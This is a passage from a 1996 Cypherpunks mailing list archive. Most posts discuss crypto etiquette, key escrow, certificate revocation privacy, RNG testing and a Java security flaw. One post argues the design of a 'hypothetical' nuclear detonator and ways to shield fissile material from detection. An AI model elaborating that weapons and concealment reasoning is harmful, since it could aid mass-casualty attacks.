> of those issues. Much easier to deal with than attacks from several 
> dozen directions all of the time.
> 

The following has been revised:





> > Your point is well 
> > taken and greatly appreciated; I made a hasty reply to Derek - in 
> > making that hasty reply, I made a serious error; however, in fact, 
> > what I said has nothing to do with the facts. Derek's reply 
> > concerned me, I was afraid that I had gone too far.
> > At the time that  I composed that, I was trying to be vague 
> > in a deliberate act of obscrurantism; because Derek, alone among you 
> > seem to understand what was going on, and was very, very close to home - 
> > I acted rashly and made a stupid bluder -  I can do 
> > nothing about that except to apologize, admit it freely and take my
> > medicine from Perry and the others - 
> > 
> > I can assure you that the quoted three 
> > lines are not a part of the algorithms, and have never been. I 
> > hope that you will forgive me for such a stupid blunder. I hope that 
> > such stupidity on my part does not close your mind to even looking at 
> > the actual algorithms - the question is to do justice for 
> > you and for me. I was only trying to decide what to do about 
> > releasing the algorithms, and how I could go about douing that as a 
> > result of some highly unusual problems in doing that. 
> > vague,  and trying to decide to what to do about releasing the algorithms - 
> > and some extremely difficult problems related to that -
>  
>
> 
> ---
> Send a blank message with the subject "send pgp-key" (not in
> quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Feb 1996 12:04:15 +0800
To: cypherpunks@toad.com
Subject: Re: Cluelessness V.S. Lack of Knowledge
Message-ID: <ad53b1aa000210044cf1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:29 PM 2/23/96, Alan Olsen wrote:

>There are companies out there that are trying to build good
>products.  These people can be instructed on the ways of
>implementing good crypto.  Unfortunately, I have seen a number
>of them pushed up against the "Wall of Attitude" when they do
>ask for help.  Cypherpunks, for good or for bad, have a
>reputation for being experts in the field.  People come here to
>ask questions because "Cypherpunks know what Good Crypto tastes
>like".  What is happening though is that they are also getting
>a reputation as people who flame first and give answers later,
>if ever.  This is not a "good thing".  If you want strong
>crypto to exist, you have to make the people who are trying to
>put it into place able to understand what it is in the first
>place.  Giving them grief when they try to find out the flaws
>in the ideas (and are willing to learn) is not helpful to the
>community as a whole.

I disagree. There are several points to keep in mind:

1. There are many sources of information on crypto, including excellent
books on cryptography and information theory, and several FAQs readily
available. There are frequent pointers to these FAQs, books, journals, and
newsgroups.

2. Most of the "harsh criticisms" come when people do one or more of the
following:

a. announce an amazing new discovery, but refuse to give details ("we have
applied for patents on our amazing new discovery")

b. show an unawareness of basic facts which any competent cryptologist
should at least be familiar with

c. expect "the Cypherpunks" to provide free consulting and educational
training (this same issue comes up on sci.crypt all the time, too, with
people announcing some new cipher--which is usually some variant of a
well-known cipher--and expressing frustration that "nobody will help me try
to break it.")

3. "The Cypherpunks" is not a freelance consulting group, doing
"Underwriter's Laboratories" (as in "UL Approved" on your electrical
appliances) tests on proposed new systems. Even weak ciphers take time to
break. See above. Or see the many comments to this effect in sci.crypt (in
fact, I recall that it's in the FAQ for sci.crypt.)

4. In any case, with 1000 or more subscribers, and no consensus mechanism
(no official position), nearly any proposal is going to be met with some
negative comments from _someone_. Welcome to the real world. Anyone whose
skin is so thin as to be scared off from posting because he fears that
_someone_ will criticize his idea is a hopeless case.

5. Genuinely good ideas, or ideas that appear to come from someone who has
done some real research and thinking, are usually responded to pretty
favorably. I could cite the work on MixMaster, Crypto++, Blowfish, etc.


>I know of one developer who is trying to implement a strong
>cryptosystem in his app.  He is unwilling to post his
>questions/concerns here because he is afraid of getting his ass
>shot off on the first query.  Judging by some of the responses
>I have seen, I do not blame him!  I can understand intolerance
>of the sales droids who push crap.  I do not have much
>tolerance for them either.  It bothers me when I see people who
>are not experts in the field AND ARE TRYING TO LEARN getting
>"blowed up real good" because they are not experts.
>
>Cypherpunks not only need to teach, they need to be willing to
>teach.

There's a huge textbook on crypto: Schneier's book. Also, numerous books by
Koblitz, Denning, Meyer and Matyas, and on and on.

If your friend has a system which builds on basic principles, he won't be
"shot down." If his ideas are good ones, he'll be embraced as a colleague.
If he hasn't absorbed the standard theory, he'll be dismissed curtly. As it
should be.

Breaking a system, even one based on good principles, takes real work. Few
people will volunteer to put free time and computer resources into testing
the strength of unknown systems. Think about it.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 25 Feb 1996 07:36:52 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: [Off topic] Re: Easy Nuclear Detonator
Message-ID: <m0tqAvX-000958C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain




At 08:05 PM 2/22/96 -0500, Black Unicorn wrote:

>Actually, your design still is vulnerable to my objection, as my 
>objection was specifically to your intermediary chamber concept.
>
>Your intermediary chamber, if surrounding the blasting cap, is likely to 
>detonate to one side first, at a right angle to the axis of the chamber 
>to the explosive assembly. 

What I anticipated, to tell you the truth, was a long intermediary thin tube 
(again, 1 mm diameter for concreteness, just as an example) BETWEEN a 
chamber surrounding the cap, and the secondary chamber.  (the secondary 
chamber would be carefully designed to spread the shock front evenly)   I 
fully intended to avoid all of the possible consequences of weird explosive 
modes in common blasting caps.

What really mystifies me is that you would think somebody who was 
intelligent enough to be capable of building a bomb could possibly be 
unaware of the strange behavior of common blasting caps?  Do you think we're 
all stupid out here?!?

Last time I talked to Dr. Edgerton in his lab (You _do_ know about Dr. 
Edgerton, don't you?!?  EG+G?), in about 1978 or so, he showed me some 
interesting pictures he had taken of blasting caps exploding, and the weird 
patterns they made.  Believe me, from that moment onwards I had no illusions 
about the predictability of the common blasting cap.  

BTW, the reason Edgerton paid a bit of attention to ME, as opposed to 
every other lowly undergrad at MIT, was the fact that I did something he had 
tried many times and failed to do:  For my strobe laboratory project, I decided 
that I was going to photograph a popcorn kernel opening up at 10,000 frames 
per second.  He called it "impossible": I called it a challenge.  That is 
why I did the  project.  I showed him 11 frames taken a few weeks later.

Dr. Edgerton was suitably impressed.

>> >1>  Interference from the milling shape and accuracy o
f the openings to 
>> >the tubes containing the liquid explosive.
>> 
>> Quantify, quantify.  How much of a problem?
>
>Clever question given that I am without any information as to the exact 
>shape of your tubes, if they are bowled down towards the explosive 
>assembly, or what their exact width (excepting your vague 1mm figure) 
>might be.  You make some guesses as to material, but these two are fairly 
>flimsy even by your own admission.

I don't expect you to be able to "use ESP" and anticipate all the exact 
mistakes somebody could make.  Rather, you should be willing to accept the 
principle, and explain how much inaccuracy is "too much," and try to give an 
example of an error that would produce an inaccuracy of this magnitude.  So 
far you've done none of this.  I have to conclude you were simply trolling, 
or intentionally spreading FUD (Fear, Uncertainty, and Doubt) without 
genuinely trying to get involved in an interesting hypthetical idea.

BTW, while I do indeed consider this as purely hypothetical, on the 
offchance you're a FUDmeister from the government, you should be aware that 
_I'm_ fully aware that while the main form of radioactive emanation from 
Pu-239 is alphas which can be stopped by a piece of paper or a few inches of 
air, I am also fully aware that the decay produces a substantial quantity of 
gamma radiation (whose exact wavelengths and energies I can easily look up 
in my trusty CRC Handbook).   So don't bother flying an airplane equipped 
with a gamma ray detector over my house; while I haven't the inclination to 
do the calculations, were it important to do so I'd calculate the minimum 
thickness of lead required to reduce the gamma intensity to below-background 
levels (using gamma-ray cross section tables and the appropriate equations), 
double or triple it, _and_ ensure that anything I did manage to acquire would 
be invisible to even a secretly-placed nearby detector at all times.

And I'm also fully aware of ground-penetrating SAR (and the possibility of 
mobile variants) and JSTARS and terahertz radar, etc, so don't bother scanning.

>All you need to realize to appreciate the problem is that if you do not 
>have a precisely milled end, with a precise depth into the compressing high 
>explosive outer face, you have differences in how and when the various 
>faces of the explosive assembly are going to initiate.  If you make your 
>tubes narrow, it becomes very hard to mill the ends of your tubes, and if 
>you widen the tubes, it exagerates the distortive effect of 
>irregularities in the tube ends.

But you should be able to estimate the magnitude of the errors.  Given a 
certain detonation velocity, for example, and assuming some sort of 
localized slowdown/speedup to to this velocity, you should be able to 
estimate (even if only accurate to a factor of 2-3) the amount of error 
present at that particular junction.  Again, the fact that you have never 
done even this rudimentary analysis is quite telling.  You've revealed 
nothing that I wasn't aware of, and that was apparently quite intentional.

>I'm not in the business of designing nuclear initiators.  I expose poorly 
>thought out explosive engineering as a hobby.  Your best solution is to 
>mill each tube exactly alike, right down the the degree of bend and slope 
>of arc as well as shape of either end.  But you could have figured that 
>out without me spelling it our for you.

More likely, I would have velocity-tested sample configurations down to 10 
nsec accuracy, which would have revealed any unexpected error sources from 
temperature and/or pressure variation, as well as mechanical considerations 
such as bent tubing, etc... 

[stuff deleted]

>But they don't.  The timing problem is quite significant.  Why do you 
>think high speed and superaccurate switches are so well guarded?  There 
>isn't an easy grassroots substitute, if there were, the switches would be 
>fairly useless.

Maybe that's the secret.  I already anticipated this.  If it's the 
government's motivation to keep "terrorists" from trying to build a bomb, 
then their first line of defense might be to make it appear more difficult 
than it really is.  They also know that secrets which are actually turned 
into running, installed hardware eventually leak to the public, meaning that 
it might actually be better to keep THEIR bombs complicated, and to not use 
simplifying hardware. 


>> >Remember, kryonic switiches are necessary even when dealing with the 
>> >speeds of electric conductivity.  The velocities of even hydrazine based 
>> >explosives are signigicantly lower.  The margin for error is similarly 
lower.
>> 
>> How low?  Be specific.
>
>Again, I don't know what your dimentions are.  Hydrazine explosives tend 
>to detonate around 8500-10000 m/s.  The speed of transmission of electric 
>impulses through a given conductive medium is certainly much higher.

Why do you keep mentioning "hydrazine explosives" when I didn't?  Are you 
some sort of "one-trick pony"?

>
>> >Plutonium gun is still the easiest method for the home grown nuclear 
>> >device, even if it requires more fissile material.
>> 
>> The "gun" design wasn't used with the plutonium, because IT WOULD NOT HAVE 
>> WORKED! "Fat Man," the bomb dropped on Nagasaki, used the implosion 
method.  
>> "Little Boy," the gun-method bomb, used U-235.   Plutonium detonates far 
too 
>> rapidly to use the "gun" method.   The 
>> scientists knew that in 1945.  You seem to be at least 50 years behind the 
>> times.
>
>You are correct this time.  My fault.  Uranium should have been in there.  
>Typo on my part. 

Finally!  He's able to admit a MISTAKE!  


>Hey, be my guest.  If you had a critical mass worth of plutonium you're 
>playing around with the wrong list, and, I might add, wasting your time 
>with anything but the black market for the material.

If I had some, or for that matter if I even wanted some, would I be 
advertising the fact on an "NSA-required-reading" list BEFORE I'd done 
all this work?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Feb 1996 16:13:31 +0800
To: Alex Strasheim <cypherpunks@toad.com
Subject: Re: REM_ote
Message-ID: <ad53b6f9010210048c41@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:32 PM 2/23/96, Alex Strasheim wrote:
>> Marianne Mueller, Java security engineer, also said the chances of such
>> hacking occurring are "remote."
>
>This is the sort of bullshit that gets companies in trouble.  Netscape has
>a good record of responding to and fixing security problems.  Why should
>they feel the need to do spin control?  This borders on lying.

Might want to be careful calling Marianne a borderline liar. She's our host
for Cypherpunks meetings at Sun, where's she's in the Java group. The
article didn't make it clear that she's with Sun and not Netscape. She's
also been coming to Cypherpunks meetings since the beginning, and posts
here occasionally.

I'm sure she can speak for herself, but she may not see this comment for a
while, hence my comment here.

As for the substance of her remarks, best to let her elaborate. Though,
knowing journalists, it's quite possible that her "remote" remark was
embedded in a much longer comment, which the reporter chose to cut.

--Tim may

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Sun, 25 Feb 1996 03:26:33 +0800
To: cypherpunks@toad.com
Subject: Re: Puffer 2.0 Released
Message-ID: <199602240101.UAA29346@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>>
Is PC1 a stream cipher implemented in a "clean room", by reference to an
abstract specification of the algorithm implied by the Alleged-RC4 source
code, that interoperates with RC4-40 ?
<<<<<

Yes, I wrote it in Pascal (Delphi) using only the English pseudo-code 
provided by Bruce Schneier in the 2nd edition of Applied Cryptography.  
I call my implementation PC1 to avoid any possible trademark hassles.  
The sample RC4 vector that the State Dept. sent me for my Commodity 
Jurisdiction request showed that my implementation is correct.  And
of course, there are no patents to worry about and I'm not under any
non-disclosure agreements.

RSADSI's government-sponsored monopoly on 40-bit exportable encryption
is over. 

I generate a key by combining a 40-bit pseudo-random salt with 40-bits
of secret key material.  The secret key material is the lower 40-bits of
a salted pass-phrase after running through a SHA-1 hash.

All the specs and file formats are included with the documentation.

Kent

Puffer is available at http://execpc.com/~kbriggs


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMS5jYCoZzwIn1bdtAQF6dwF/XrD1BgPpNbvh1ZDq5bYg52q3PpYpBchj
3BbJgjS0FudNzkysl65vo4klEDEyHYb9
=9frt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Sun, 25 Feb 1996 07:35:58 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: REM_ote
In-Reply-To: <199602231751.MAA16891@pipe3.nyc.pipeline.com>
Message-ID: <312E91CA.15FB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> 
> > Marianne Mueller, Java security engineer, also said the chances of such
> > hacking occurring are "remote."
> 
> This is the sort of bullshit that gets companies in trouble.  Netscape has
> a good record of responding to and fixing security problems.  Why should
> they feel the need to do spin control?

Marianne Mueller is a Sun employee, not a Netscape employee. The
original quote did not make that clear.

PK
--
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://www.netscape.com/people/karlton
Netscape Communications

     They that can give up essential liberty to obtain a little
     temporary safety deserve neither liberty nor safety.
		- Benjamin Franklin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sat, 24 Feb 1996 11:52:35 +0800
To: cypherpunks@toad.com
Subject: Re: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <199602240134.UAA07386@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 23, 1996 00:19:15, '"P.J. Ponder"
<ponder@wane-leon-mail.scri.fsu.edu>' wrote: 
 
 
> 
>Steve Walker wrote to John Young: 
> 
>(large piece snipped; good stuff though.) 
> 
>+  Suppose the U.S. government had never thought of placing 
>export controls on cryptography... 
> 
>We would now have widespread use of encryption, both 
>domestically and worldwide; we would be in a state of 
>"Utopia," with widespread availability of cryptography 
>with unlimited key lengths. But, once in this state, we 
>will face situations where we need a file that had been 
>encrypted by an associate who is unavailable (illness, 
>traffic jam, or change of jobs). We will then realize 
>that we must have some systematic way to recover our 
>encrypted information when the keys are unavailable. 
> 
 
The exchange of information among many trusted people all located in the
same geographical location (or with regular reliable couriers travelling to
different locations) is the ideal situation for *private* not public key
crypto. In such circumstances one uses, e.g. IDEA, not PGP. 
 
End of corporate problem. End of "worry" about problems with PGP. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Date: Sun, 25 Feb 1996 07:34:44 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Digital Watermark
In-Reply-To: <199602240347.EAA05595@utopia.hacktic.nl>
Message-ID: <199602240510.VAA05276@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know if the source code for this is
available?

I have a bunch of photos of myself modeling clear plastic
raincoats that I want to put on the net, but I would like
to try to tag them before I do.

Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 24 Feb 1996 15:33:33 +0800
To: Alex Strasheim <cypherpunks@toad.com
Subject: Re: REM_ote
Message-ID: <199602240609.WAA15885@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:28 PM 2/23/96 -0600, Alex Strasheim wrote:
>> Might want to be careful calling Marianne a borderline liar. She's our host
>> for Cypherpunks meetings at Sun, where's she's in the Java group. The
>> article didn't make it clear that she's with Sun and not Netscape. She's
>> also been coming to Cypherpunks meetings since the beginning, and posts
>> here occasionally.
>
>I apologize for the remark, it was out of line.  I don't know who she is,
>or what she actually said, for that matter.
>
>But the fact remains that these sorts of security problems were predicted
>well before Java was widely deployed.  They're serious, and this isn't
>going to be the last one.  An awful lot of people aren't going to patch
>their copies of Netscape any time soon, either.

I agree these problems will continue to show up from time to time.  With a
large security kernel, you will have security bugs.  However, if the fixes
come out in a week, then the hacking potental is greatly reduced.

>(A useful feature for Netscape might be a facility that checks
>periodically to see if a security patch is in order, and displays a
>warning if it is.)

A very good idea.  An advantage for web based products.

>Problems with security are a fact of life.  I've made embarassing mistakes
>that compromised security for some of my users.  When that happens you
>have to come clean, tell the truth, and fix the problem.  Don't try to
>convince people that you didn't screw up, that the problem isn't serious. 
>Don't say things that will encourage users to put off installing a
>security patch.  And don't underestimate the ability of your attackers.

This is all true.  However, from what I know, in this case you would need
to know the details of the flaw, and be able to generate a java bytecode
stream which takes advantage of the problem.  If the fixes come out
quickly, then your attackers don't have much time.  However if they
discover the flaw before you do you are in deep shit.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 25 Feb 1996 07:36:30 +0800
To: cypherpunks@toad.com
Subject: Re: REM_ote
In-Reply-To: <ad53b6f9010210048c41@[205.199.118.202]>
Message-ID: <199602240428.WAA00352@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Might want to be careful calling Marianne a borderline liar. She's our host
> for Cypherpunks meetings at Sun, where's she's in the Java group. The
> article didn't make it clear that she's with Sun and not Netscape. She's
> also been coming to Cypherpunks meetings since the beginning, and posts
> here occasionally.

I apologize for the remark, it was out of line.  I don't know who she is,
or what she actually said, for that matter.

But the fact remains that these sorts of security problems were predicted
well before Java was widely deployed.  They're serious, and this isn't
going to be the last one.  An awful lot of people aren't going to patch
their copies of Netscape any time soon, either.

(A useful feature for Netscape might be a facility that checks
periodically to see if a security patch is in order, and displays a
warning if it is.)

Problems with security are a fact of life.  I've made embarassing mistakes
that compromised security for some of my users.  When that happens you
have to come clean, tell the truth, and fix the problem.  Don't try to
convince people that you didn't screw up, that the problem isn't serious. 
Don't say things that will encourage users to put off installing a
security patch.  And don't underestimate the ability of your attackers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 24 Feb 1996 14:06:53 +0800
To: karlton@netscape.com (Phil Karlton)
Subject: Re: REM_ote
In-Reply-To: <312E91CA.15FB@netscape.com>
Message-ID: <199602240441.WAA00378@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Marianne Mueller is a Sun employee, not a Netscape employee. The
> original quote did not make that clear.

Again, I apologize to Ms. Meuller and to Netscape.

In my opinion Netscape has a great track record of addressing concerns and
problems with its software.  Other companies would do well to use
Netscape's policy of addressing and correcting proven security problems,
instead of denying and downplaying them, as a model. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 24 Feb 1996 16:43:37 +0800
To: cypherpunks@toad.com
Subject: Re: new "obscenity" law on the net
Message-ID: <199602240737.XAA14990@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>[Ben sent this to rms at 'Sat, 3 Feb 1996 10:32:00 -0700'];
>"Ben A. Mesander" <ben@gnu.ai.mit.edu> writes:
>>Just curious - will the new law outlawing obscenity on the net in the us
>>cause you to make changes to some of the comments in the emacs source code?
>
>Some weeks ago, Lars and Richard went through the Gnus source and
>removed 'fuck' two times and 'fucking' one time (if I didn't get it
>all wrong). I wonder if that's your fault.

A number of years ago, the Political Correctness folks at AT&T cleaned up
the termcap and terminfo files that were distributed with Unix.
You really can't talk about the Hazeltine terminal without using the word
"brain-damaged", and the "2621-ba" was redescribed as "broken arrow keys" :-)


                        Bill, who spent far too much time tweaking termcaps....


#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 24 Feb 1996 16:45:10 +0800
To: cypherpunks@toad.com
Subject: Anonymous access to certificate revocation lists?
Message-ID: <199602240737.XAA14996@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[Hmmm - a crypto-related technical discussion that looks like it's 
coderpunks material?]

The article on Digital Signature Legislation by Brad Biddle <biddle@acusd.edu>
Privacy Rights Clearinghouse, Ctr for Public Interest Law
http://pwa.acusd.edu/~prc
had good coverage of the legal issues related to the Utah digital signature law,
but it touched on one interesting technical point - signature verification
systems that use Certificate Revocation Lists are vulnerable to traffic analysis
because you need to check the CRL at a CA every time you want to verify a
signature from a user certified by that CA.  (There's also denial-of-service
risk.)

For example,  Alice wants to check the signature on Document D, 
which is signed by Bob, whose key is certified by Carol's CA.
Alice may have Bob's public key, or may need to fetch it from somewhere
(this is only a minor traffic analysis risk; she can get it from Bob
or from some public server, or even download all keys from the server.)
If the signature on Document D is good, Alice needs to verify Bob's key.
Alice can check Carol's signature on the key (perhaps fetching Carol's),
but she also needs to know if Bob's key is still good or if it's been revoked.
In a PGP environment, Bob is the only one who can revoke a key, and he's
responsible for shipping out revocations.  In a X.509 environment,
Carol the certifier can revoke her certification of Bob, so Alice has to
check with Carol to be sure she hasn't.  This creates a transaction record.

Biddle's article is concerned about the privacy implications of
Carol knowing about everybody who wants to verify Bob's key, because
the law doesn't address who she can sell the data to.
For cypherpunks, there are more concerns - it's tough to have a 
private conversation if you've got to exchange messages with
your friendly Government Post Office Certification Authority.

Is there a need to build anonymous CRL-checking proxies so people can
check X.509 signatures (e.g. the ones used by Netscape) anonymously?
How much caching can you do?  How would you decide how much to trust it?
The failure modes look different from anonymous remailers, where
a dishonest remailer can save your address, but you can protect yourself
by chaining remailers in serial.  With anonymous CRL proxies,
a dishonest proxy can tell you that "Bob"'s key isn't on Carol's CRL when it is;
to avoid this problem, you need to ask a bunch of proxies in parallel,
which means that any dishonest proxy can reveal your queries.

There's also the denial of service problem - depending on your policies,
and their implementation in software (especially packaged software),
what happens if you don't get a reply saying either yes or no on revocation -
what if Carol or a Man In The Middle decides not to respond to Alice's requests,
or to requests for certifications on Bob's key?  Are you hosed?

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 24 Feb 1996 17:02:32 +0800
To: cypherpunks@toad.com
Subject: Re: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <199602240738.XAA15096@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 12:19 AM 2/23/96, P.J. Ponder wrote:
>>The first paragraph here bothered me.  If a user (or an organization)
>>needs to have access to data that was encrypted by an associate ( or one
>>of its employees) wouldn't sound practice require that the key not be
>>entrusted to just one person?  I don't see the need for any fancy
>>"key-recovery" protocol with any outside entities.  We can handle this
>>internally in my shop.  Some keys I give a copy to Alice, and down the
>>hall Bob has some, too.  If I get hit by the bus, they can get my company
>>related data back.  We don't need any "service" or "licensee" or "trusted
>>third party" or any of that, thank you very much.  And we don't need any
>>one developing OTPs for us either, and we don't need government agencies
>>keeping copies of any of our keys.

Hear, hear!  A decade or so ago, when I was a tool of the Military-Industrial
Complex, we had key escrow and trusted third-party products, but they were
appropriate technology - Big Ugly Safes that were rated for classified storage.
If you had data or (physical) keys or safe combinations you wanted to protect,
you could put them in the safes in the computer room or security office.  The
main thing we used the latter for was the combination of the computer-room safe,
which we kept in a sealed envelope for emergencies.  The same technique
can work just fine for crypto keys today.  If you'd rather use electronic
storage
than sticking floppies in a safe, encrypt the password with Corporate Security's
public key, and email it to them with a Subject: line explaining what it is.
Retrieval is easy, and it's _not_ automatic; a human needs to be involved,
which is a Good Thing - this is _supposed_ to be an emergency backup.
If you don't trust it, split the key and email to two different Corporate
Security Management folks.  If you don't trust the users not to send bogus keys,
you shouldn't be trusting them with the information the keys protect.

(System V being what it was in those days, we protected the root password
to our computer by giving it to all the technically competent users so they
could reboot the VAX or exceed system limits to get their work done.  :-)



#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 24 Feb 1996 16:54:22 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602240738.XAA15114@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:08 AM 2/22/96 -0500, SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu> wrote:
>What they have gained is the knowledge that their random number source
>isn't broken.  If your RNG started spewing 0 bits by the thousand would
>you say "This stream is just as likely as any other stream that I can
>imagine so there is no problem", or "My RNG is broken".  Of course,
>in nice mathematical abstractions your RNG never breaks, but we live in
>a nasty world of thermal failiures and cold solder joints.

They _haven't_ gained that knowledge, only the knowledge that it isn't
_totally_ broken and spewing zeros.  For example, the output of
       while(1) printf("%8c", des(i++, key));  // Pretend syntax is correct
would probably pass the randomness tests just fine, in spite of being entirely
predictable and having only 56 bits of key plus log(i) bits of state, 
and is  vulnerable to most cryptanalysis attacks on DES systems as well.
But it's not a One Time Pad, it's just counter-mode DES.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 24 Feb 1996 17:09:41 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: Hash of plaintext as key?
Message-ID: <199602240738.XAA15134@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:56 AM 2/22/96 -0800, John Pettitt <jpp@software.net> wrote:
>I have this application which encrypts software prior to distribution.  I'd
>like to pre-encrypt most of the data (individual files) and then just
>encrypt all the individual file keys with a customer specific key at run
>time.  (This is mostly a CPU cycle saving thing).

Depending on the security environment you're running in, this can be
fine or can be dangerous; think about your threat models carefully.
For some applications, it makes a lot of sense.  It does give you
a traffic analysis problem - Eavesdroppers can tell that you sent the same
document to Alice, Bob, and Eve, but not Fred, in case this matters to you.
You could strengthen it a bit by superencrypting the copy you send to
the user with a very fast Snake-Oil algorithm, but Eve has the real document
(and the version encrypted with the good algorithm), so she's got known
plaintext for cracking messages sent to Alice and Bob if she wants.
In a DES world, you might do almost-triple-DES by encrypting with two common
keys up front and use DES with separate third keys for the final stage.
With RC4 or RC5, that doesn't gain you much, since the difference between
RC4/40 and RC4/256 is all in the key-scheduling phase, not the bulk part.

>I thought I'd use the MD5 (or SHA) hash of the plaintext as the key. Plenty
>of entropy in the entire plaintext, a different key for each file and if you
>know the plaintext to calculate they key you don't need the key anyway!

It doesn't really gain you anything; generating pseudo-random key bits
isn't much work compared to encrypting the files or public-key encrypting
the file keys to send to users, and there's no benefit other than getting some
extra entropy bits (which you may want to do anyway to stir into your
entropy pool in addition to using a random number source.)

What it does risk, in case this threat matters, is that somebody who can guess
the documents you might be encrypting can calculate their MD5s and trial
decrypt.
This lets them verify whether a given document is in the encrypted database,
for instance.

One of the NSA Rainbow Books discusses secure databases - maybe Purple or Gray?

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 25 Feb 1996 04:34:15 +0800
To: cypherpunks@toad.com
Subject: Re: Conference report - resolving security workshop
Message-ID: <199602240738.XAA15151@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:55 PM 2/22/96 -0800, Raph Levien <raph@c2.org> wrote:

>   The biggest problem with S/MIME is that the signed and encrypted
>format reveals who made the signatures. Obviously, this has severe
